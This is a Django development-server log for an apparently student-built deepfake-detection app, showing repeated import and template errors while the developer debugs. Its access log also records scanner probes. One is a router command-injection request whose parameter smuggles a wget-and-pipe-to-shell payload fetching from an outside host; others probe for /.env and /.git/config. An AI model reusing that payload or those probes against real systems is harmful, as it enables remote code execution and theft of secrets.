  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 10, in <module>
    from MesoNet_model import mesonet
  File "/myproject/MesoNet_model/mesonet.py", line 10, in <module>
    model = Meso4()
  File "/myproject/MesoNet_model/classifiers.py", line 30, in __init__
    self.model = self.init_model()
  File "/myproject/MesoNet_model/classifiers.py", line 40, in init_model
    x1 = Activation('swish')(x1)  # 활성화 함수 변경 (ReLU → Swish)
NameError: name 'Activation' is not defined
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:37:17.729814: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:37:17.729870: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:37:19.317557: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:37:19.317893: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:37:19.318067: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:37:19.318457: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 10, in <module>
    from MesoNet_model import mesonet
  File "/myproject/MesoNet_model/mesonet.py", line 10, in <module>
    model = Meso4()
  File "/myproject/MesoNet_model/classifiers.py", line 30, in __init__
    self.model = self.init_model()
  File "/myproject/MesoNet_model/classifiers.py", line 40, in init_model
    x1 = Activation('swish')(x1)  # 활성화 함수 변경 (ReLU → Swish)
NameError: name 'Activation' is not defined
/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:37:55.340235: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:37:55.340402: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:37:56.898421: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:37:56.898869: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:37:56.899134: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:37:56.899528: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:37:57
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:37:57] "GET / HTTP/1.0" 200 2347
/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:38:20.416156: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:38:20.416309: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:38:22.020034: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:38:22.020097: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:38:22.020132: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:38:22.020450: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 10, in <module>
    from MesoNet_model import mesonet
  File "/myproject/MesoNet_model/mesonet.py", line 10, in <module>
    model = Meso4()
  File "/myproject/MesoNet_model/classifiers.py", line 30, in __init__
    self.model = self.init_model()
  File "/myproject/MesoNet_model/classifiers.py", line 40, in init_model
    x1 = Activation('swish')(x1)  # 활성화 함수 변경 (ReLU → Swish)
NameError: name 'Activation' is not defined
/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:39:26.923940: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:39:26.923998: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:39:28.511521: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:39:28.511577: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:39:28.511610: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:39:28.511996: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 10, in <module>
    from MesoNet_model import mesonet
  File "/myproject/MesoNet_model/mesonet.py", line 10, in <module>
    model = Meso4()
  File "/myproject/MesoNet_model/classifiers.py", line 30, in __init__
    self.model = self.init_model()
  File "/myproject/MesoNet_model/classifiers.py", line 40, in init_model
    x1 = Activation('swish')(x1)  # 활성화 함수 변경 (ReLU → Swish)
NameError: name 'Activation' is not defined
/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:39:53.137787: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:39:53.137845: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:39:54.710839: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:39:54.710911: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:39:54.710949: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:39:54.711286: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:39:55
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:39:56] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 12:39:57] "GET /model_use/ HTTP/1.0" 200 3427
frame_predictions (before filtering): 딥페이크 확률: 1.00, 샘플링된 프레임 수: 10
[15/Dec/2024 12:40:06] "POST /process_video/ HTTP/1.0" 200 3667
Not Found: /cgi-bin/luci/;stok=/locale
[15/Dec/2024 12:56:51] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2Fbanthis.su%2Ft%7Csh%3B%60) HTTP/1.0" 404 3053
Not Found: /.env
[15/Dec/2024 13:09:15] "GET /.env HTTP/1.0" 404 2879
[15/Dec/2024 13:10:31] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 13:44:58] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 14:00:15] "GET / HTTP/1.0" 200 2347
Not Found: /login.rsp
[15/Dec/2024 14:04:52] "GET /login.rsp HTTP/1.0" 404 2894
[15/Dec/2024 14:09:08] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 14:25:24] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 14:25:28] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 14:25:31] "GET /model_types/ HTTP/1.0" 200 5408
[15/Dec/2024 15:12:58] "GET /?max-keys=1 HTTP/1.0" 200 2347
[15/Dec/2024 15:12:59] "GET /?max-keys=5000 HTTP/1.0" 200 2347
[15/Dec/2024 15:19:59] "GET / HTTP/1.0" 200 2347
Not Found: /webui/
[15/Dec/2024 15:21:35] "GET /webui/ HTTP/1.0" 404 2885
Not Found: /geoserver/web/
[15/Dec/2024 15:23:12] "GET /geoserver/web/ HTTP/1.0" 404 2909
[15/Dec/2024 15:36:29] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 15:36:30] "GET /model_types/ HTTP/1.0" 200 5408
[15/Dec/2024 15:38:07] "GET /model_types/ HTTP/1.0" 200 5422
[15/Dec/2024 15:38:16] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 15:38:17] "GET /model_types/ HTTP/1.0" 200 5422
[15/Dec/2024 15:38:19] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 15:58:43] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 16:03:51] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 16:05:18] "GET / HTTP/1.0" 200 2347
Not Found: /login.rsp
[15/Dec/2024 16:07:49] "GET /login.rsp HTTP/1.0" 404 2894
[15/Dec/2024 16:14:30] "GET / HTTP/1.0" 200 2347
Not Found: /cdn-cgi/trace
[15/Dec/2024 16:31:32] "GET /cdn-cgi/trace HTTP/1.0" 404 2913
Not Found: /.git/config
[15/Dec/2024 16:33:06] "GET /.git/config HTTP/1.0" 404 2900
[15/Dec/2024 16:53:57] "GET / HTTP/1.0" 200 2347
Not Found: /.env
[15/Dec/2024 17:00:26] "GET /.env HTTP/1.0" 404 2879
[15/Dec/2024 17:03:06] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 17:03:07] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 17:04:52] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 17:05:24] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:05:25] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:05:34] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:05:36] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:05:36] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:05:41] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 17:05:53] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 17:05:57] "GET /model_types/ HTTP/1.0" 200 5422
[15/Dec/2024 17:06:15] "GET /model_types/ HTTP/1.0" 200 5422
[15/Dec/2024 17:11:59] "GET /model_types/ HTTP/1.0" 200 5678
[15/Dec/2024 17:13:32] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:13:36] "GET /model_types/ HTTP/1.0" 200 6214
[15/Dec/2024 17:14:01] "GET /model_types/ HTTP/1.0" 200 6218
[15/Dec/2024 17:15:04] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:16:01] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 17:16:06] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 17:16:08] "GET /model_comparison/ HTTP/1.0" 200 773
[15/Dec/2024 17:19:15] "GET / HTTP/1.0" 200 2961
Not Found: /img/back.jpg
[15/Dec/2024 17:19:16] "GET /img/back.jpg HTTP/1.0" 404 2903
[15/Dec/2024 17:20:10] "GET / HTTP/1.0" 200 2977
Not Found: /myproject/templates/back.jpg
[15/Dec/2024 17:20:11] "GET /myproject/templates/back.jpg HTTP/1.0" 404 2951
[15/Dec/2024 17:20:12] "GET / HTTP/1.0" 200 2977
Not Found: /myproject/templates/back.jpg
[15/Dec/2024 17:20:13] "GET /myproject/templates/back.jpg HTTP/1.0" 404 2951
[15/Dec/2024 17:20:13] "GET / HTTP/1.0" 200 2977
Not Found: /myproject/templates/back.jpg
[15/Dec/2024 17:20:13] "GET /myproject/templates/back.jpg HTTP/1.0" 404 2951
[15/Dec/2024 17:20:35] "GET / HTTP/1.0" 200 2956
Not Found: /back.jpg
[15/Dec/2024 17:20:35] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:20:36] "GET / HTTP/1.0" 200 2956
Not Found: /back.jpg
[15/Dec/2024 17:20:36] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:20:36] "GET / HTTP/1.0" 200 2956
Not Found: /back.jpg
[15/Dec/2024 17:20:36] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:20:53] "GET / HTTP/1.0" 200 2967
Not Found: /templates/back.jpg
[15/Dec/2024 17:20:53] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:20:58] "GET / HTTP/1.0" 200 2967
Not Found: /templates/back.jpg
[15/Dec/2024 17:20:58] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:21:00] "GET / HTTP/1.0" 200 2967
Not Found: /templates/back.jpg
[15/Dec/2024 17:21:00] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:21:09] "GET / HTTP/1.0" 200 2941
Not Found: /templates/back.jpg
[15/Dec/2024 17:21:09] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:21:09] "GET / HTTP/1.0" 200 2941
Not Found: /templates/back.jpg
[15/Dec/2024 17:21:10] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:21:10] "GET / HTTP/1.0" 200 2941
Not Found: /templates/back.jpg
[15/Dec/2024 17:21:10] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:21:58] "GET / HTTP/1.0" 200 2956
Not Found: /back.jpg
[15/Dec/2024 17:21:58] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:22:37] "GET / HTTP/1.0" 200 2918
Not Found: /back.jpg
[15/Dec/2024 17:22:37] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:22:38] "GET / HTTP/1.0" 200 2918
Not Found: /back.jpg
[15/Dec/2024 17:22:38] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:22:39] "GET / HTTP/1.0" 200 2918
Not Found: /back.jpg
[15/Dec/2024 17:22:39] "GET /back.jpg HTTP/1.0" 404 2891
[15/Dec/2024 17:22:54] "GET / HTTP/1.0" 200 2622
[15/Dec/2024 17:28:48] "GET / HTTP/1.0" 200 4711
Not Found: /img/back.jpg
[15/Dec/2024 17:28:48] "GET /img/back.jpg HTTP/1.0" 404 2903
[15/Dec/2024 17:29:31] "GET / HTTP/1.0" 200 4711
Not Found: /img/back.jpg
[15/Dec/2024 17:29:31] "GET /img/back.jpg HTTP/1.0" 404 2903
[15/Dec/2024 17:29:52] "GET / HTTP/1.0" 200 4763
Not Found: /img/back.jpg
[15/Dec/2024 17:29:52] "GET /img/back.jpg HTTP/1.0" 404 2903
[15/Dec/2024 17:30:40] "GET / HTTP/1.0" 200 4719
Not Found: /templates/back.jpg
[15/Dec/2024 17:30:40] "GET /templates/back.jpg HTTP/1.0" 404 2921
[15/Dec/2024 17:30:41] "GET / HTTP/1.0" 200 4719
Not Found: /templates/back.jpg
[15/Dec/2024 17:30:41] "GET /templates/back.jpg HTTP/1.0" 404 2921
Internal Server Error: /
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 505, in parse
    compile_func = self.tags[command]
KeyError: 'static'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/myproject/myproject/views.py", line 19, in index
    return render(request, 'index.html')
  File "/usr/local/lib/python3.8/dist-packages/django/shortcuts.py", line 24, in render
    content = loader.render_to_string(template_name, context, request, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 61, in render_to_string
    template = get_template(template_name, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 15, in get_template
    return engine.get_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/backends/django.py", line 33, in get_template
    return Template(self.engine.get_template(template_name), self)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 175, in get_template
    template, origin = self.find_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 157, in find_template
    template = loader.get_template(name, skip=skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/cached.py", line 57, in get_template
    template = super().get_template(template_name, skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/base.py", line 28, in get_template
    return Template(
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 154, in __init__
    self.nodelist = self.compile_nodelist()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 200, in compile_nodelist
    return parser.parse()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 507, in parse
    self.invalid_block_tag(token, command, parse_until)
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 568, in invalid_block_tag
    raise self.error(
django.template.exceptions.TemplateSyntaxError: Invalid block tag on line 16: 'static'. Did you forget to register or load this tag?
[15/Dec/2024 17:32:40] "GET / HTTP/1.0" 500 136901
Internal Server Error: /
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 505, in parse
    compile_func = self.tags[command]
KeyError: 'static'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 55, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/base.py", line 197, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/myproject/myproject/views.py", line 19, in index
    return render(request, 'index.html')
  File "/usr/local/lib/python3.8/dist-packages/django/shortcuts.py", line 24, in render
    content = loader.render_to_string(template_name, context, request, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 61, in render_to_string
    template = get_template(template_name, using=using)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loader.py", line 15, in get_template
    return engine.get_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/backends/django.py", line 33, in get_template
    return Template(self.engine.get_template(template_name), self)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 175, in get_template
    template, origin = self.find_template(template_name)
  File "/usr/local/lib/python3.8/dist-packages/django/template/engine.py", line 157, in find_template
    template = loader.get_template(name, skip=skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/cached.py", line 57, in get_template
    template = super().get_template(template_name, skip)
  File "/usr/local/lib/python3.8/dist-packages/django/template/loaders/base.py", line 28, in get_template
    return Template(
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 154, in __init__
    self.nodelist = self.compile_nodelist()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 200, in compile_nodelist
    return parser.parse()
  File "/usr/local/lib/python3.8/dist-packages/django/template/base.py", line 507, in parse
    self.invalid_block_tag(token, command, parse_until)
